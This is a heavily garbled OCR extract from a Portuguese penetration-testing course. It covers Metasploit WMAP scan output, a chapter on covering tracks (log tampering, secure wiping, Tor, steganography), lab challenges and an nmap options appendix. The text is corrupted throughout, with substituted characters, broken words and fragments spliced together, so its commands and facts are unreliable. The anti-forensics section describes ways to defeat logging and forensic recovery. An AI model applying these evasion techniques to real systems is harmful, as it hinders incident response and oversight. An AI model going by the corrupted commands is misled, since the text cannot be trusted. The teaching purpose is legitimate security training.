Capítulo 19 >eta"plo%t rae:or( - 255 No profile runs all ena)led modules" msf P %mapKrun -t WX @oaded au4iliar<$scanner$#ttp$%e)davK%e)siteKcontent """ WX @oaded au4iliar<$scanner$#ttp$#ttpKversion """ WX @oaded au4iliar<$scanner$#ttp$%e)davKscanner """ WX @oaded au4iliar<$scanner$#ttp$svnKscanner """ WX @oaded au4iliar<$scanner$#ttp$soapK4ml """ """corte"""
udo o que resta agora realiDar a varredura ontra nossa HB/ alvo. msf P %mapKrun -e WX sing /@@ %map ena)led modules" WX
@aunc#ing
au4iliar<$scanner$#ttp$%e)davK%e)siteKcontent
(/KS9Y9 against AB"F8""B0>:80 WX
Oound
file
or
director<
in
e)D/Y
response
AB"F8""B0>J
#ttp:$$AB"F8""B0>$ WX Scanned of #osts 00M completeJ WX @aunc#ing au4iliar<$scanner$#ttp$#ttpKversion (/KS9Y9 against AB"F8""B0>:80 WX AB"F8""B0> (icrosoft-IIS$F"0 """corte""" WX Scanned of #osts 00M completeJ WX
@aunc#ing
au4iliar<$scanner$#ttp$dirKlisting
(/KDI9
$
against
AB"F8""B0>:80""" WX Scanned of #osts 00M completeJ msf P
1.14.3. erifi!ano res'l"aos 4ssim que a varredura tiver finaliDadoE vamos verifiar o bano de dados para
Capítulo 19 >eta"plo%t rae:or( - 256
ver se o Gmap enontrou algo de interessante. msf P d)K#osts -c address,svcs,vulns ;osts LLLLL address -------
svcs vulns ---- -----
AB"F8""B0>
msf P
Olando a saída aimaE podemos ver que o Gmap
reportou uma
vulnerabilidade. ;
msf P d)Kvulns WX Time: T#u Nov B! 00:!0:BE T? B00 Yuln: #ostLAB"F8""B0> portL80
protoLtcp
nameL;TT-T9/?-N/.@D
refsL./#).
4 informação sobre a vulnerabilidade est3 odifiada no formato base0#E e por isso preisamos deodifi3,la. $odemos usar o openssl para isso.
Capítulo 19 >eta"plo%t rae:or( - 257 msf P ec#o [./#).
$odemos agora usar essa informação para onseguir mais detales obre a vulnerabilidades reportada. Como pentestersE devemos investigar ada informação enontrada e identifiar se 3 poteniais mtodos de ataque.
1!1-! ?a#orat9rio 3etasploit $bMeti&os? 1 Obter aesso remoto na m3quina /inu< e
1!16! Contramedidas ●
6anter todos os apliativos atualiDados
●
4pliar pates de orreção e segurança
●
6anter regras de fireGall bem onfiguradas
Capítulo 19 >eta"plo%t rae:or( - 258
Capítulo %0 pagando Rastros
%0!1! "#$etivos ●
;ntender a importUnia de obrir rastros
●
Coneer as tnias para enobrir suas aç%es
●
Coneer as ferramentas empregadas
Capítulo 20 ;pagando *a"tro" - 259
%0!%! Por &ue en.o#rir rastros( Hm dos objetivosE em um teste de invasãoE de utiliDar tnias para enobrir seus rastros e aç%esE para testar a efi3ia e ompetVnia do time de resposta a inidentes e períia forense aso os mesmos e
%0!)! " &ue en.o#rir( ●
/ogs de I-S ➢
●
Onde são armaDenadas todas as evidVnias de tr3fego anormal que tena sido detetado na rede. Isso inlui desde o envio de arquivos maliiosos à varreduras no sistemaE em busa de informaç%es.
/ogs de FireGall ➢
/ogs que guardam as informaç%es filtradas por regras de fireGall. 'ormalmente os administradoresE quando riam as regras de fireGallE tem por 3bito mandar armaDenar em log tentativas de varredurasE ataques de brute fore e aesso sem autoriDação a serviços espeífios.
●
4rquivos opiados no sistema ➢
Rualquer arquivo que tena sido opiado para o sistemaE mesmo que posteriormente seja apagadoE dei
Capítulo 20 ;pagando *a"tro" - 260 ●
4rquivos sendo e
odo programa ou arquivo em e
●
/ogs de omandos ➢
udo o que digitado no terminal armaDenado no .bas_istorA do usu3rioE por e
●
/ogs de sessão ➢
Ruando efetuamos o login e autentiamos uma sessão v3lidaE tudo o que oorre na mesma armaDenado em logs. 4lgumas organiDaç%es possuemE inlusiveE servidores e<lusivos para armaDenamento e gereniamento de logs. 'o /inu
%0!4! T'.ni.as ●
Sobreesrita de dados ➢
Ruando apagamos algo em um disoE os dados são apenas marados para a deleção e não realmente apagados. Os dados marados para a deleçãoE são apagados apenas quando o sistema operaional utiliDa os mesmos bloos do diso para gravar novos dadosE realiDando a sobreesrita. Ruanto mais veDes aquele mesmo setor for sobreesritoE mais difíil se tornar3 a reuperação das informaç%es originalmente e
●
$revenção de riação de dados ➢
= possívelE atravs da alteração de permissão em determinados arquivosE que novos dados sejam inseridos no mesmoE por e
Capítulo 20 ;pagando *a"tro" - 261
a possibilidade de esrita nos mesmoE nenuma nova operação ser3 armaDenadaE e o administrador do sistema não poder3 faDer a verifiação posterior para entender o que omprometeu o sistema ou a rede. ●
;nriptação de dados ➢
4 melor maneira de oultar um arquivoE para que ningum veja seu onteQdoE ou onsiga alter3,loE enriptando,oE seja atravs de uma ferramenta espeífia de enriptaçãoE seja oultando o arquivo dentro de outroE uja e
●
-eleção segura de dados ➢
;ssa tnia est3 diretamente vinulada om a primeiraE de sobreesrita de dados. odo e qualquer proesso de deleção de arquivosE deve ser uidadosoE para que não seja possível a posterior reuperação das informaç%es.
%0!-! Aerramentas ●
or e Onion BouterJ ➢
O or mantm o usu3rio livre de bisbiloteirosE inlusive os do F+I e os da CI4E e impede ou difiulta bastanteJ qualquer tipo de rastreamento. ; e
●
8ipe ➢
8ipe um apliativo que permite a deleção segura de dadosE permitindo que o usu3rio defina quais arquivos serão apagados e quantas veDes aqueles bloos de disoE onde os arquivos apagados estavam aloadosE
Capítulo 20 ;pagando *a"tro" - 262
serão sobreesritos. Ruanto mais veDes se sobreesreveE mais difíil a posterior reuperação dos dados. Cada operação de sobreesrita deve ser realiDada at o finalE para que o prorama seja ompletamente efiaD. ●
Srub ➢
Outra possibilidade para realiDar o Xdata GipingYE sobresrevendo os dados deletados om um padrão determinado de informaç%esE que podem ou não ser removidas no final da informação. Se não forem removidasE o perito forense enontrar3 apenas Xli
●
Stegide ➢
Stegide um programa de esteganografia que apaD de esonder dados em v3rios tipos de arquivos de 3udio e de imagem. 4s frequVnias de som e de orE respetivamenteE não são alteradas tornando o arquivo resistente ontra testes estatístios de primeira ordem. Formatos de arquivos P$;9E +6$E 84@ e 4H são suportados para uso omo arquivo de ZoberturaZ. 'ão 3 restriç%es sobre o formato dos dados seretos. O algoritmo de riptografia padrão o Bijndael om uma ave de 12 bits de omprimento que 4;S , 4dvaned ;nrAption StandardJ. Se voV não onfia nesta ombinação por qualquer raDãoE sinta,se à vontade para esoler outra ombinação modo&algoritmo.
%0!6! Contramedidas ●
Instalar >ost I-S em todas as m3quinas
●
6anter as regras de fireGall e 'etGor: I-S bem onfiguradas
●
9ereniar logs em servidores pr7prios e bem protegidos
●
9ereniar permiss%es em servidoresE utiliDando ferramentas omo o S;/inu
Capítulo 20 ;pagando *a"tro" - 263
Capítulo %1 @esaios: Testes de Invasão
%1!1! "#$etivo ●
;
●
Conseguir aesso ao arquivo Aou_got_te_flag.t
Capítulo 21 ?e"af%o"@ !e"te" de In#a"ão - 264
%1!%! @esaio 1 '3 m3quina om o I$ indiado pelo instrutorE 3 um apliação 8;+ simulando o site de um bano. O objetivo do desafio e
%1!)! @esaio % 'esse desafio finalE na rede alvoE que pertene à empresa que le ontratou para realiDar o teste de invasãoE voV preisa enontrar um arquivo amado Aou_got_te_flag.t
Capítulo 21 ?e"af%o"@ !e"te" de In#a"ão - 265
,7"S
Capítulo 21 ?e"af%o"@ !e"te" de In#a"ão - 266
Primeiro ane8o
"pç*es do ,map TARGET SPECIFICATION
SCAN TECHNIQUES
Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.1!.".1# 1"."."$2%%.1$2%4
-sS: +CP )- )can -s*: Connect )can -s!: C0 )can -s+: 8indows )can -s$: 3aimon scan -s: +CP &'', scan -s: I )can -s: mas )can
-iL
-iR
--exclude
--excludefile
--scanflags
HOST DISCOVERY PORT SPECIFICATION AND SCAN ORDER
-sL: (ist )can $ simp'* 'ist targets to scan -sP: Ping )can $ determining if host is on'ine -P0: +reat a'' hosts as on'ine $$ skip host discoer* -PS[potlist]: +CP )- discoer* to gien ports -P![potlist]: +CP C0 discoer* to gien ports -P"[potlist]: P discoer* to gien ports -P#: IC3P echo re&est discoer* pro5es -PP: timestamp re&est discoer* pro5es -P$: netmask re&est discoer* pro5es -%&-R: eer/'wa*s reso'e ) $defa&'t sometimes --d%s-se'es
--s(ste)-d%s: se 6)7s ) reso'er
-p
-s5: Pro5e open ports determine serice/ersion info --'esio%-i%te%sit(
--'esio%-li4ht: (imit to most 'ike'* pro5es =intensit* 2< --'esio%-ll: +r* eer* sing'e pro5e =intensit* 9<
--'esio%-tce: )how detai'ed ersion scan actiit* =for de5&gging<
Capítulo 21 ?e"af%o"@ !e"te" de In#a"ão - 267 6) E+EC+I6 -O: Ena5'e 6) detection --sscan-l!"!#: (imit 6) detection to promising targets --sscan-g$%ss: >&ess 6) more aggressie'*
once -': Increase er5osit* 'ee' =&se twice for more effect< -d[le'el]: )et or increase de5&gging 'ee' =p to 9<
--pcet-tce: )how a'' packets sent and receied
--iflist: Print host interfaces and ro&tes =for de5&gging<
--lo4-eos: (og errors/warnings to the norma'$format TI&ING AND PERFOR&ANCE
o&tp&t fi'e
--ppe%d-output:
ppend to rather than c'o55er specified o&tp&t fi'es 6ptions which take ?time@ are in mi''iseconds, &n'ess *o& --esu)e
--)i%-host4oup&)x-host4oup
--)i%-pllelis)&)x-pllelis)
--)i%-tt-ti)eout&)x-tt-ti)eout&i%itiltt-ti)eout
--host-ti)eout
--sc%-del(&--)x-sc%-del(
--;ex)l:
Deference st*'esheet from Insec&re.6rg for more porta5'e 3( Preent associating --%o-st(lesheet: st*'esheet w/3( o&tp&t
of
)(
&ISC
-: Ena5'e IP scanning -!: Ena5'es 6) detection and Fersion detection --dtdi
--se%d-eth&--se%d-ip: )end &sing raw ethernet frames or IP packets
FIRE'A((/IDS EVASION AND SPOOFING
--pi'ile4ed:
-f7 --)tu <'l>:
-5 : Print ersion n&m5er -h: Print this he'p s&mmar* page.
fragment packets =optiona''* w/gien 3+<
ss&me that the &ser is f&''* prii'eged
-8
-S : )poof so&rce address
-e
-4&--souce-pot
--dt-le%4th <%u)>:
E)A&P(ES )imp'e nmap -v nmap -v nmap -v nmap -v
-A scanme.nmap.org -sP 192.168.0.016 10.0.0.08 -i! 10000 -P0 -p 80 "s# scanme.nmap.org > file.t$t
ppend random data to sent packets --ttl <'l>: )et IP time$to$'ie fie'd
Pop&'ar / P&5'ished s*ntax
--spoof-)c <)c dd&pefix&'e%do %)e>:
%&AP -vv -A -s# -' -p- -P0 -o( target.$ml ))).$$$.***.+++
)poof *o&r 3C address
--dsu): )end packets with a 5og&s +CP/P checks&m
OUTPUT
-o -o -oS -o9 -o!
nmap -vv -s# -P0 "p- -n --min,hostgroup 100 --ma$,retries --ma$,rtt,timeout 120 --min,parallelism 100 -oA